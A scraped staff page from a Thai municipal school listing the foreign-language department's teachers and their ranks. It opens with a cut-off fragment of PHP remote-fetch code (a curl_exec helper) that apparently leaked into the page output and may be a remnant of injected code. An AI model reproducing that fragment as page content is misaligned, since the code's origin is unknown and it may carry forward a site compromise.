topt($d,CURLOPT_HEADER,0); $e=curl_exec($d); curl_close($d); return $e; } ?> กลุ่มสาระการเรียนรู้ภาษาต่างประเทศ - Wat Tha Satoi Municipal School | https://thasatoi.ac.th

กลุ่มสาระการเรียนรู้ภาษาต่างประเทศ

นางสาวเยาวลักษณ์ อินทจักร
ครูชำนาญการพิเศษ (คศ.3)
( หัวหน้าสาระ )
นางรุ่งนภา แก้วก๋อง
ครูเชี่ยวชาญ (คศ.4)
นางปิยรัตน์ สุวรรณเขตนิคม
ครูชำนาญการพิเศษ (คศ.3)
นางสาวกิตติยา ขุระสะ
ผู้ช่วยครู